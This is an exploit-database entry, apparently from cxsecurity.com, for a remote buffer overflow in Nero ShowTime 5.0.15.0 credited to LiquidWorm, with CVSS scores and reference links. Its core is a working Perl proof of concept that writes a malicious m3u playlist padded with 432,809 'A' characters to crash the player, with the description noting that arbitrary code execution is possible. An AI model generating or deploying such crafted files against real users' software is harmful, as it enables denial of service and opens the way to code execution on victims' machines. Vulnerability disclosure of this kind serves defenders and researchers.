Nero ShowTime 5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC

2009.08.27
Credit: LiquidWorm
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/perl -w # # Nero ShowTime v5.0.15.0 m3u Playlist File Remote Buffer Overflow PoC # # Summary: Nero ShowTime provides you with a high-performance software DVD player # that takes you to a new dimension in DVD's. Its cinema-like sound and excellent image # quality for all digital pictures make an adventure of every film! What is more, Nero ShowTime # supports all DVD-Video formats and can play them from a disc and from the hard drive. # # Product web page: http://www.nero.com # # Description: Nero ShowTime is prone to a buffer-overflow vulnerability because it fails # to perform adequate boundary checks on user-supplied input. Successfully exploiting # these issues may allow remote attackers to execute arbitrary code in the context of the # application. Failed exploit attempts will cause denial-of-service conditions. Nero ShowTime # 5.0.15.0 is vulnerable, prior versions may also be affected. # # Tested on Microsoft Windows XP Professional SP2 (English) # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # # liquidworm [ t00t ] gmail [ d0t ] com # # 24.11.2008 # $filename = "Jackie_Chan.m3u"; $mana = "A" x 432809; print "\n\n[*] Creating evul playlist: $filename ...\r\n"; sleep(3); open(m3u, ">./$filename") || die "\n\aCannot open $filename: $!"; print m3u "$mana"; close (m3u); print "\n[*] Playlist file successfully created!\r\n";

References:

http://xforce.iss.net/xforce/xfdb/46811
http://www.securityfocus.com/bid/32446
http://www.milw0rm.com/exploits/7207
http://secunia.com/advisories/32850
http://osvdb.org/50199


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top